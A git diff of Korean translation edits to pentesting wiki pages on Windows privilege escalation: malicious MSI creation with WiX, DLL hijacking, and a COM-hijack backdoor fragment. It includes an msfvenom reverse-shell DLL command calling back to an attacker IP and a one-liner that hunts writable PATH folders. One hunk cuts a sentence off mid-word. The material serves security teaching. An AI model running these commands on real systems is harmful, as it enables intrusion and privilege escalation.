 Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
 ```
-그럼, HKCU 항목을 생성하면 사용자가 로그인할 때마다 백도어가 실행됩니다.
+그럼 HKCU 항목을 생성하면 사용자가 로그인할 때마다 백도어가 실행됩니다.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
index 0b4295639..5105af446 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -2,9 +2,9 @@
 
 # 악성 MSI 생성 및 루트 권한 획득
 
-MSI 설치 프로그램의 생성은 wixtools를 사용하여 수행되며, 특히 [wixtools](http://wixtoolset.org)가 활용됩니다. 대체 MSI 빌더가 시도되었으나, 이 특정 경우에는 성공하지 못했다는 점은 주목할 만합니다.
+MSI 설치 프로그램의 생성은 wixtools를 사용하여 수행되며, 특히 [wixtools](http://wixtoolset.org)가 활용됩니다. 대체 MSI 빌더가 시도되었지만, 이 특정 경우에는 성공하지 못했다는 점은 주목할 만합니다.
 
-wix MSI 사용 예에 대한 포괄적인 이해를 위해 [이 페이지](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with)를 참조하는 것이 좋습니다. 여기에서는 wix MSI 사용을 보여주는 다양한 예를 찾을 수 있습니다.
+wix MSI 사용 예에 대한 포괄적인 이해를 위해 [이 페이지](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with)를 참조하는 것이 좋습니다. 여기에서 wix MSI 사용을 보여주는 다양한 예를 찾을 수 있습니다.
 
 목표는 lnk 파일을 실행할 MSI를 생성하는 것입니다. 이를 달성하기 위해 다음 XML 코드를 사용할 수 있습니다 ([xml from here](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)):
 ```markup
@@ -44,7 +44,7 @@ Package 요소에는 InstallerVersion 및 Compressed와 같은 속성이 포함
 ```
 candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
 ```
-추가적으로, 게시물에 명령과 그 출력이 포함된 이미지가 제공된다는 점을 언급할 가치가 있습니다. 시각적 안내를 위해 참조할 수 있습니다.
+추가로, 게시물에 명령과 그 출력이 포함된 이미지가 제공된다는 점을 언급할 가치가 있습니다. 시각적 안내를 위해 참조할 수 있습니다.
 
 또한, wixtools의 또 다른 도구인 light.exe가 wixobject에서 MSI 파일을 생성하는 데 사용될 것입니다. 실행할 명령은 다음과 같습니다:
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index 3292fd005..7c725aa5d 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-DLL Hijacking은 신뢰할 수 있는 애플리케이션이 악성 DLL을 로드하도록 조작하는 것을 포함합니다. 이 용어는 **DLL Spoofing, Injection, and Side-Loading**과 같은 여러 전술을 포함합니다. 주로 코드 실행, 지속성 달성 및 덜 일반적으로 권한 상승을 위해 사용됩니다. 여기서 상승에 초점을 맞추고 있지만, 하이재킹 방법은 목표에 관계없이 일관됩니다.
+DLL Hijacking은 신뢰할 수 있는 애플리케이션이 악성 DLL을 로드하도록 조작하는 것을 포함합니다. 이 용어는 **DLL Spoofing, Injection, 및 Side-Loading**과 같은 여러 전술을 포함합니다. 주로 코드 실행, 지속성 달성, 그리고 덜 일반적으로 권한 상승을 위해 사용됩니다. 여기서 상승에 초점을 맞추고 있지만, 하이재킹 방법은 목표에 관계없이 일관됩니다.
 
 ### Common Techniques
 
@@ -12,8 +12,8 @@ DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플
 
 1. **DLL Replacement**: 진짜 DLL을 악성 DLL로 교체하며, 원래 DLL의 기능을 유지하기 위해 DLL Proxying을 선택적으로 사용할 수 있습니다.
 2. **DLL Search Order Hijacking**: 악성 DLL을 합법적인 DLL보다 앞서 검색 경로에 배치하여 애플리케이션의 검색 패턴을 악용합니다.
-3. **Phantom DLL Hijacking**: 애플리케이션이 존재하지 않는 필수 DLL로 생각하게 만드는 악성 DLL을 생성합니다.
-4. **DLL Redirection**: `%PATH%` 또는 `.exe.manifest` / `.exe.local` 파일과 같은 검색 매개변수를 수정하여 애플리케이션을 악성 DLL로 유도합니다.
+3. **Phantom DLL Hijacking**: 애플리케이션이 로드할 악성 DLL을 생성하여 존재하지 않는 필수 DLL로 착각하게 만듭니다.
+4. **DLL Redirection**: `%PATH%` 또는 `.exe.manifest` / `.exe.local` 파일과 같은 검색 매개변수를 수정하여 애플리케이션이 악성 DLL을 가리키도록 합니다.
 5. **WinSxS DLL Replacement**: WinSxS 디렉토리에서 합법적인 DLL을 악성 DLL로 대체하는 방법으로, 종종 DLL 사이드 로딩과 관련이 있습니다.
 6. **Relative Path DLL Hijacking**: 복사된 애플리케이션과 함께 사용자 제어 디렉토리에 악성 DLL을 배치하여 Binary Proxy Execution 기술과 유사하게 만듭니다.
 
@@ -29,12 +29,12 @@ DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플
 
 ![](<../../images/image (314).png>)
 
-**일반적으로 누락된 dll을 찾고 있다면** 몇 **초** 동안 이 상태로 두십시오.\
+**일반적으로 누락된 dll을 찾고 있다면** 몇 **초** 동안 이 작업을 실행합니다.\
 **특정 실행 파일 내에서 누락된 dll을 찾고 있다면** **"Process Name" "contains" "\<exec name>"**와 같은 **다른 필터를 설정하고 실행한 후 이벤트 캡처를 중지해야** 합니다.
 
 ## Exploiting Missing Dlls
 
-권한을 상승시키기 위해, 우리가 가질 수 있는 최선의 기회는 **특권 프로세스가 로드하려고 시도할 DLL을 작성하는 것**입니다. 따라서 우리는 **원래 DLL이 있는 폴더보다 먼저 검색되는 폴더에 DLL을 작성할 수 있습니다**(이상한 경우) 또는 **DLL이 검색될 폴더에 작성할 수 있으며 원래 DLL이 어떤 폴더에도 존재하지 않습니다**.
+권한을 상승시키기 위해, 우리가 가질 수 있는 최선의 기회는 **특권 프로세스가 로드하려고 시도할 DLL을 작성하는 것**입니다. 따라서 우리는 **원래 DLL이 검색되는 폴더보다 먼저 검색되는 폴더에 DLL을 작성할 수 있습니다**(이상한 경우) 또는 **DLL이 검색될 폴더에 작성할 수 있으며 원래 DLL이 어떤 폴더에도 존재하지 않습니다**.
 
 ### Dll Search Order
 
@@ -49,7 +49,7 @@ DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플
 3. 16비트 시스템 디렉토리. 이 디렉토리의 경로를 얻는 함수는 없지만 검색됩니다. (_C:\Windows\System_)
 4. Windows 디렉토리. 이 디렉토리의 경로를 얻으려면 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 함수를 사용합니다. (_C:\Windows_)
 5. 현재 디렉토리.
-6. PATH 환경 변수에 나열된 디렉토리. 여기에는 **App Paths** 레지스트리 키에 의해 지정된 애플리케이션별 경로가 포함되지 않습니다. DLL 검색 경로를 계산할 때 **App Paths** 키는 사용되지 않습니다.
+6. PATH 환경 변수에 나열된 디렉토리. 여기에는 **App Paths** 레지스트리 키에 의해 지정된 애플리케이션별 경로가 포함되지 않습니다. **App Paths** 키는 DLL 검색 경로를 계산할 때 사용되지 않습니다.
 
 이것이 **SafeDllSearchMode**가 활성화된 상태에서의 **기본** 검색 순서입니다. 비활성화되면 현재 디렉토리가 두 번째 위치로 상승합니다. 이 기능을 비활성화하려면 **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 레지스트리 값을 생성하고 0으로 설정합니다(기본값은 활성화됨).
 
@@ -63,21 +63,7 @@ DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플
 
 Windows 문서에서 표준 DLL 검색 순서에 대한 특정 예외가 언급됩니다:
 
-- **메모리에 이미 로드된 DLL과 이름이 같은 DLL**이 발견되면 시스템은 일반 검색을 우회합니다. 대신 리디렉션 및 매니페스트를 확인한 후 메모리에 이미 있는 DLL로 기본 설정합니다. **이 경우 시스템은 DLL 검색을 수행하지 않습니다**.
-- DLL이 현재 Windows 버전의 **알려진 DLL**로 인식되는 경우, 시스템은 검색 프로세스를 생략하고 알려진 DLL의 버전과 해당 종속 DLL을 사용합니다. 레지스트리 키 **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**는 이러한 알려진 DLL의 목록을 보유합니다.
-- **DLL에 종속성이 있는 경우**, 이러한 종속 DLL에 대한 검색은 **모듈 이름**만으로 표시된 것처럼 수행됩니다. 초기 DLL이 전체 경로를 통해 식별되었는지 여부에 관계없이 말입니다.
-
-### Escalating Privileges
-
-**Requirements**:
-
-- **다른 권한**(수평 또는 측면 이동)으로 작동하거나 작동할 **프로세스**를 식별하고, **DLL이 누락된** 상태여야 합니다.
-- **DLL이 검색될** **디렉토리**에 대한 **쓰기 권한**이 있어야 합니다. 이 위치는 실행 파일의 디렉토리일 수도 있고 시스템 경로 내의 디렉토리일 수도 있습니다.
-
-네, 기본적으로 **특권 실행 파일이 DLL이 누락된 상태를 찾는 것은 다소 이상합니다**. 그리고 **시스템 경로 폴더에 쓰기 권한을 갖는 것은 더욱 이상합니다**(기본적으로는 불가능합니다). 그러나 잘못 구성된 환경에서는 가능합니다.\
-운이 좋고 요구 사항을 충족하는 경우 [UACME](https://github.com/hfiref0x/UACME) 프로젝트를 확인할 수 있습니다. **프로젝트의 주요 목표가 UAC 우회이지만**, 사용할 수 있는 Windows 버전의 DLL 하이재킹 **PoC**를 찾을 수 있습니다(아마도 쓰기 권한이 있는 폴더의 경로만 변경하면 됩니다).
-
-폴더에서 **권한을 확인할 수 있습니다**:
+- **메모리에 이미 로드된 DLL과 이름이 같은 DLL**이 발견되면 시스템은 일반 검색을 우회
 ```bash
 accesschk.exe -dqv "C:\Python27"
 icacls "C:\Python27"
@@ -91,7 +77,7 @@ for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F
 dumpbin /imports C:\path\Tools\putty\Putty.exe
 dumpbin /export /path/file.dll
 ```
-전체 가이드는 **System Path 폴더에 쓰기 권한을 가진 Dll Hijacking을 악용하여 권한을 상승시키는 방법**을 확인하세요:
+전체 가이드는 **System Path 폴더**에 쓰기 권한을 가지고 **Dll Hijacking을 악용하여 권한 상승하는 방법**을 확인하세요:
 
 {{#ref}}
 dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -104,20 +90,20 @@ dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
 
 ### 예시
 
-악용 가능한 시나리오를 찾는 경우, 성공적으로 악용하기 위해 가장 중요한 것 중 하나는 **실행 파일이 가져올 모든 함수를 내보내는 dll을 생성하는 것입니다**. 어쨌든, Dll Hijacking은 [**Medium Integrity 레벨에서 High로 상승시키는 데 유용합니다 (UAC 우회)**](../authentication-credentials-uac-and-efs.md#uac) 또는 [**High Integrity에서 SYSTEM으로**](./#from-high-integrity-to-system)**.** 유효한 dll을 생성하는 방법에 대한 예시는 이 dll hijacking 연구에서 찾을 수 있습니다: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
-또한, **다음 섹션**에서는 **템플릿**으로 유용할 수 있는 **기본 dll 코드**를 찾을 수 있습니다 또는 **필요하지 않은 함수가 내보내진 dll을 생성하는 데** 사용할 수 있습니다.
+악용 가능한 시나리오를 찾는 경우, 성공적으로 악용하기 위해 가장 중요한 것 중 하나는 **실행 파일이 가져올 모든 함수를 내보내는 dll을 생성하는 것**입니다. 어쨌든, Dll Hijacking은 [**Medium Integrity 레벨에서 High로 상승하는 데 유용합니다 (UAC 우회)**](../authentication-credentials-uac-and-efs.md#uac) 또는 [**High Integrity에서 SYSTEM으로**](./#from-high-integrity-to-system)**.** 유효한 dll을 생성하는 방법에 대한 예시는 이 dll hijacking 연구에서 찾을 수 있습니다: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
+또한, **다음 섹션**에서는 **템플릿**으로 유용할 수 있는 **기본 dll 코드**를 찾을 수 있습니다.
 
 ## **Dll 생성 및 컴파일**
 
 ### **Dll 프록시화**
 
-기본적으로 **Dll 프록시**는 **로드될 때 악성 코드를 실행할 수 있는 Dll**이지만, **실제 라이브러리에 대한 모든 호출을 중계하여** **예상대로 작동**하고 **노출**할 수 있는 Dll입니다.
+기본적으로 **Dll 프록시**는 **로드될 때 악성 코드를 실행할 수 있는 Dll**이지만, **실제 라이브러리에 대한 모든 호출을 중계하여** **노출**하고 **작동**할 수 있는 Dll입니다.
 
 [**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant) 또는 [**Spartacus**](https://github.com/Accenture/Spartacus) 도구를 사용하면 실제로 **실행 파일을 지정하고 프록시화할 라이브러리를 선택하여** **프록시화된 dll을 생성**하거나 **Dll을 지정하고 프록시화된 dll을 생성**할 수 있습니다.
 
 ### **Meterpreter**
 
-**Rev shell 얻기 (x64):**
+**rev shell 가져오기 (x64):**
 ```bash
 msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index c4e94ff3d..e9db66d42 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -2,30 +2,24 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-<figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
+## Basic Information
 
-**버그 바운티 팁**: **Intigriti**에 **가입하세요**, 해커를 위해 해커가 만든 프리미엄 **버그 바운티 플랫폼**입니다! 오늘 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)에서 저희와 함께하고 최대 **$100,000**의 보상을 받으세요!
+DLL Hijacking은 신뢰할 수 있는 애플리케이션이 악성 DLL을 로드하도록 조작하는 것입니다. 이 용어는 **DLL Spoofing, Injection, 및 Side-Loading**과 같은 여러 전술을 포함합니다. 주로 코드 실행, 지속성 달성, 그리고 덜 일반적으로 권한 상승을 위해 사용됩니다. 여기서 상승에 초점을 맞추고 있지만, 하이재킹 방법은 목표에 관계없이 일관됩니다.
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
-## 기본 정보
-
-DLL 하이재킹은 신뢰할 수 있는 애플리케이션이 악성 DLL을 로드하도록 조작하는 것입니다. 이 용어는 **DLL 스푸핑, 주입 및 사이드 로딩**과 같은 여러 전술을 포함합니다. 주로 코드 실행, 지속성 달성 및 덜 일반적으로 권한 상승을 위해 사용됩니다. 여기서 상승에 초점을 맞추고 있지만, 하이재킹 방법은 목표에 관계없이 일관됩니다.
-
-### 일반적인 기술
+### Common Techniques
 
 DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플리케이션의 DLL 로딩 전략에 따라 효과가 다릅니다:
 
-1. **DLL 교체**: 진짜 DLL을 악성 DLL로 교체하며, 원래 DLL의 기능을 유지하기 위해 DLL 프록시를 사용할 수 있습니다.
-2. **DLL 검색 순서 하이재킹**: 악성 DLL을 합법적인 DLL보다 앞서 검색 경로에 배치하여 애플리케이션의 검색 패턴을 악용합니다.
-3. **팬텀 DLL 하이재킹**: 애플리케이션이 로드할 악성 DLL을 생성하여 존재하지 않는 필수 DLL로 인식하게 합니다.
-4. **DLL 리디렉션**: `%PATH%` 또는 `.exe.manifest` / `.exe.local` 파일과 같은 검색 매개변수를 수정하여 애플리케이션이 악성 DLL을 가리키도록 합니다.
-5. **WinSxS DLL 교체**: WinSxS 디렉토리에서 합법적인 DLL을 악성 DLL로 대체하는 방법으로, 종종 DLL 사이드 로딩과 관련이 있습니다.
-6. **상대 경로 DLL 하이재킹**: 복사된 애플리케이션과 함께 사용자 제어 디렉토리에 악성 DLL을 배치하여 이진 프록시 실행 기술과 유사하게 만듭니다.
+1. **DLL Replacement**: 진짜 DLL을 악성 DLL로 교체하며, 원래 DLL의 기능을 유지하기 위해 DLL Proxying을 선택적으로 사용할 수 있습니다.
+2. **DLL Search Order Hijacking**: 악성 DLL을 합법적인 DLL보다 앞서 검색 경로에 배치하여 애플리케이션의 검색 패턴을 악용합니다.
+3. **Phantom DLL Hijacking**: 애플리케이션이 로드할 악성 DLL을 생성하여 존재하지 않는 필수 DLL로 착각하게 만듭니다.
+4. **DLL Redirection**: `%PATH%` 또는 `.exe.manifest` / `.exe.local` 파일과 같은 검색 매개변수를 수정하여 애플리케이션이 악성 DLL을 가리키도록 합니다.
+5. **WinSxS DLL Replacement**: WinSxS 디렉토리에서 합법적인 DLL을 악성 DLL로 대체하는 방법으로, 종종 DLL 사이드 로딩과 관련이 있습니다.
+6. **Relative Path DLL Hijacking**: 복사된 애플리케이션과 함께 사용자 제어 디렉토리에 악성 DLL을 배치하여 Binary Proxy Execution 기술과 유사하게 만듭니다.
 
-## 누락된 DLL 찾기
+## Finding missing Dlls
 
-시스템 내에서 누락된 DLL을 찾는 가장 일반적인 방법은 sysinternals에서 [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)을 실행하고 **다음 2개의 필터를 설정**하는 것입니다:
+시스템 내에서 누락된 DLL을 찾는 가장 일반적인 방법은 sysinternals에서 [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)을 실행하고, **다음 2개의 필터를 설정**하는 것입니다:
 
 ![](<../../../images/image (961).png>)
 
@@ -35,60 +29,60 @@ DLL 하이재킹을 위해 여러 방법이 사용되며, 각 방법은 애플
 
 ![](<../../../images/image (153).png>)
 
-**일반적으로 누락된 dll을 찾고 있다면** 몇 **초** 동안 이 상태로 두세요.\
-**특정 실행 파일 내에서 누락된 dll을 찾고 있다면** "프로세스 이름" "포함" "\<exec name>"과 같은 **다른 필터를 설정하고 실행한 후 이벤트 캡처를 중지해야 합니다**.
+**일반적으로 누락된 dll을 찾고 있다면** 몇 **초** 동안 이 작업을 계속 실행합니다.\
+**특정 실행 파일 내에서 누락된 dll을 찾고 있다면** **"Process Name" "contains" "\<exec name>"**와 같은 **다른 필터를 설정하고, 실행한 후 이벤트 캡처를 중지해야** 합니다.
 
-## 누락된 DLL 악용하기
+## Exploiting Missing Dlls
 
-권한을 상승시키기 위해, 우리가 가질 수 있는 최선의 기회는 **특권 프로세스가 로드하려고 시도할 DLL을 작성할 수 있는 것**입니다. 따라서 우리는 **원래 DLL**이 있는 폴더보다 **먼저 검색되는 폴더**에 DLL을 **작성**할 수 있거나, DLL이 검색될 **어떤 폴더에 작성할 수 있는 것**입니다. 원래 **DLL이 어떤 폴더에도 존재하지 않는 경우**.
+권한을 상승시키기 위해, 우리가 가질 수 있는 최선의 기회는 **특권 프로세스가 로드하려고 시도할 DLL을 작성할 수 있는 것**입니다. 따라서 우리는 **원래 DLL**이 있는 폴더보다 **먼저 검색되는 폴더**에 DLL을 **작성**할 수 있거나, **DLL이 검색될 폴더**에 **작성할 수 있는** 경우가 있습니다. 원래 **DLL이 어떤 폴더에도 존재하지 않는** 경우입니다.
 
-### DLL 검색 순서
+### Dll Search Order
 
-**Microsoft 문서** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **에서 DLL이 어떻게 로드되는지 구체적으로 확인할 수 있습니다.**
+**DLL이 어떻게 로드되는지에 대한 구체적인 내용은** [**Microsoft 문서**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **에서 확인할 수 있습니다.**
 
 **Windows 애플리케이션**은 특정 순서를 따르는 **미리 정의된 검색 경로**를 따라 DLL을 찾습니다. DLL 하이재킹 문제는 해로운 DLL이 이러한 디렉토리 중 하나에 전략적으로 배치되어 진짜 DLL보다 먼저 로드되도록 할 때 발생합니다. 이를 방지하기 위한 해결책은 애플리케이션이 필요한 DLL을 참조할 때 절대 경로를 사용하도록 하는 것입니다.
 
-32비트 시스템에서 **DLL 검색 순서**는 다음과 같습니다:
+32비트 시스템에서의 **DLL 검색 순서**는 다음과 같습니다:
 
 1. 애플리케이션이 로드된 디렉토리.
-2. 시스템 디렉토리. 이 디렉토리의 경로를 얻으려면 [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) 함수를 사용하세요.(_C:\Windows\System32_)
+2. 시스템 디렉토리. 이 디렉토리의 경로를 얻으려면 [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) 함수를 사용합니다. (_C:\Windows\System32_)
 3. 16비트 시스템 디렉토리. 이 디렉토리의 경로를 얻는 함수는 없지만 검색됩니다. (_C:\Windows\System_)
-4. Windows 디렉토리. 이 디렉토리의 경로를 얻으려면 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 함수를 사용하세요. (_C:\Windows_)
+4. Windows 디렉토리. 이 디렉토리의 경로를 얻으려면 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 함수를 사용합니다. (_C:\Windows_)
 5. 현재 디렉토리.
-6. PATH 환경 변수에 나열된 디렉토리. 여기에는 **App Paths** 레지스트리 키에 의해 지정된 애플리케이션별 경로가 포함되지 않습니다. **App Paths** 키는 DLL 검색 경로를 계산할 때 사용되지 않습니다.
+6. PATH 환경 변수에 나열된 디렉토리. 여기에는 **App Paths** 레지스트리 키에 의해 지정된 애플리케이션별 경로는 포함되지 않습니다. **App Paths** 키는 DLL 검색 경로를 계산할 때 사용되지 않습니다.
 
-이것이 **SafeDllSearchMode**가 활성화된 상태에서의 **기본** 검색 순서입니다. 비활성화되면 현재 디렉토리가 두 번째 위치로 상승합니다. 이 기능을 비활성화하려면 **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 레지스트리 값을 생성하고 0으로 설정하세요(기본값은 활성화됨).
+이것이 **SafeDllSearchMode**가 활성화된 상태에서의 **기본** 검색 순서입니다. 비활성화되면 현재 디렉토리가 두 번째 위치로 상승합니다. 이 기능을 비활성화하려면 **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** 레지스트리 값을 생성하고 0으로 설정합니다(기본값은 활성화됨).
 
 [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) 함수가 **LOAD_WITH_ALTERED_SEARCH_PATH**와 함께 호출되면 검색은 **LoadLibraryEx**가 로드하는 실행 모듈의 디렉토리에서 시작됩니다.
 
-마지막으로, **DLL은 이름 대신 절대 경로를 지정하여 로드될 수 있습니다**. 이 경우 해당 DLL은 **그 경로에서만 검색됩니다**(DLL에 종속성이 있는 경우, 종속성은 이름으로 로드된 것처럼 검색됩니다).
+마지막으로, **DLL은 이름 대신 절대 경로를 지정하여 로드될 수 있습니다**. 이 경우 해당 DLL은 **오직 그 경로에서만 검색됩니다**(DLL에 종속성이 있는 경우, 종속성은 이름으로만 로드된 것처럼 검색됩니다).
 
-검색 순서를 변경하는 다른 방법이 있지만 여기서는 설명하지 않겠습니다.
+검색 순서를 변경하는 다른 방법도 있지만 여기서는 설명하지 않겠습니다.
 
-#### Windows 문서의 DLL 검색 순서 예외
+#### Exceptions on dll search order from Windows docs
 
-표준 DLL 검색 순서에 대한 특정 예외는 Windows 문서에 명시되어 있습니다:
+Windows 문서에서 표준 DLL 검색 순서에 대한 특정 예외가 언급됩니다:
 
-- **메모리에 이미 로드된 DLL과 이름이 같은 DLL**이 발견되면 시스템은 일반 검색을 우회합니다. 대신 리디렉션 및 매니페스트를 확인한 후 메모리에 이미 있는 DLL로 기본 설정합니다. **이 시나리오에서는 시스템이 DLL 검색을 수행하지 않습니다**.
-- DLL이 현재 Windows 버전의 **알려진 DLL**로 인식되는 경우, 시스템은 검색 프로세스를 생략하고 알려진 DLL의 버전과 해당 종속 DLL을 사용합니다. 레지스트리 키 **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**는 이러한 알려진 DLL의 목록을 보유합니다.
+- **메모리에 이미 로드된 DLL과 이름이 같은 DLL**이 발견되면 시스템은 일반 검색을 우회합니다. 대신 리디렉션 및 매니페스트를 확인한 후 메모리에 이미 있는 DLL로 기본 설정합니다. **이 경우 시스템은 DLL 검색을 수행하지 않습니다**.
+- DLL이 현재 Windows 버전의 **알려진 DLL**로 인식되는 경우, 시스템은 검색 프로세스를 생략하고 알려진 DLL의 버전과 그 종속 DLL을 사용합니다. 레지스트리 키 **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**는 이러한 알려진 DLL의 목록을 보유합니다.
 - **DLL에 종속성이 있는 경우**, 이러한 종속 DLL의 검색은 초기 DLL이 전체 경로를 통해 식별되었는지 여부에 관계없이 **모듈 이름**만으로 표시된 것처럼 수행됩니다.
 
-### 권한 상승
+### Escalating Privileges
 
-**요구 사항**:
+**Requirements**:
 
-- **다른 권한**(수평 또는 측면 이동)으로 작동하거나 작동할 프로세스를 식별하고, **DLL이 누락된** 상태여야 합니다.
+- **다른 권한**(수평 또는 수직 이동)으로 작동하거나 작동할 **프로세스**를 식별하고, **DLL이 없는** 상태여야 합니다.
 - **DLL이 검색될** **디렉토리**에 대한 **쓰기 권한**이 있어야 합니다. 이 위치는 실행 파일의 디렉토리일 수도 있고 시스템 경로 내의 디렉토리일 수도 있습니다.
 
-네, 기본적으로 **특권 실행 파일이 DLL이 누락된 상태를 찾는 것은 다소 이상하기 때문에** 요구 사항을 찾는 것이 복잡합니다. 그리고 **시스템 경로 폴더에 쓰기 권한을 갖는 것은 기본적으로 불가능합니다**. 그러나 잘못 구성된 환경에서는 가능합니다.\
-운이 좋다면 요구 사항을 충족하는 경우 [UACME](https://github.com/hfiref0x/UACME) 프로젝트를 확인할 수 있습니다. **프로젝트의 주요 목표가 UAC 우회이지만**, 사용할 수 있는 Windows 버전의 DLL 하이재킹 **PoC**를 찾을 수 있습니다(아마도 쓰기 권한이 있는 폴더의 경로만 변경하면 됩니다).
+네, 기본적으로 **특권 실행 파일이 DLL이 누락된 상태를 찾는 것은 다소 이상하기 때문에** 요구 사항을 찾는 것이 복잡합니다. 그리고 **시스템 경로 폴더에 쓰기 권한을 갖는 것은 더욱 이상합니다**(기본적으로는 불가능합니다). 그러나 잘못 구성된 환경에서는 가능합니다.\
+운이 좋다면 요구 사항을 충족하는 경우, [UACME](https://github.com/hfiref0x/UACME) 프로젝트를 확인할 수 있습니다. **프로젝트의 주요 목표가 UAC 우회이지만**, 사용할 수 있는 Windows 버전의 DLL 하이재킹 **PoC**를 찾을 수 있습니다(아마도 쓰기 권한이 있는 폴더의 경로만 변경하면 됩니다).
 
 폴더에서 **권한을 확인할 수 있습니다**:
 ```bash
 accesschk.exe -dqv "C:\Python27"
 icacls "C:\Python27"
 ```
-모든 폴더의 권한을 확인하십시오 PATH:
+모든 폴더의 **권한을 확인하십시오** PATH 안에:
 ```bash
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 ```
@@ -97,7 +91,7 @@ for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F
 dumpbin /imports C:\path\Tools\putty\Putty.exe
 dumpbin /export /path/file.dll
 ```
-전체 가이드는 **System Path 폴더에 쓰기 권한을 이용한 Dll Hijacking 악용 방법**을 확인하세요:
+전체 가이드는 **System Path 폴더에 쓰기 권한을 가진 Dll Hijacking을 악용하여 권한 상승하는 방법**을 확인하세요:
 
 {{#ref}}
 writable-sys-path-+dll-hijacking-privesc.md
@@ -105,7 +99,7 @@ writable-sys-path-+dll-hijacking-privesc.md
 
 ### 자동화 도구
 
-[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)는 시스템 PATH 내의 어떤 폴더에 쓰기 권한이 있는지 확인합니다.\
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)는 시스템 PATH 내의 어떤 폴더에 쓰기 권한이 있는지 확인합니다.\
 이 취약점을 발견하기 위한 다른 흥미로운 자동화 도구는 **PowerSploit 함수**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ 및 _Write-HijackDll_입니다.
 
 ### 예시
@@ -123,7 +117,7 @@ writable-sys-path-+dll-hijacking-privesc.md
 
 ### **Meterpreter**
 
-**rev shell 가져오기 (x64):**
+**Rev shell 가져오기 (x64):**
 ```bash
 msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
@@ -218,15 +212,10 @@ break;
 return TRUE;
 }
 ```
-## References
+## 참고 문헌
 
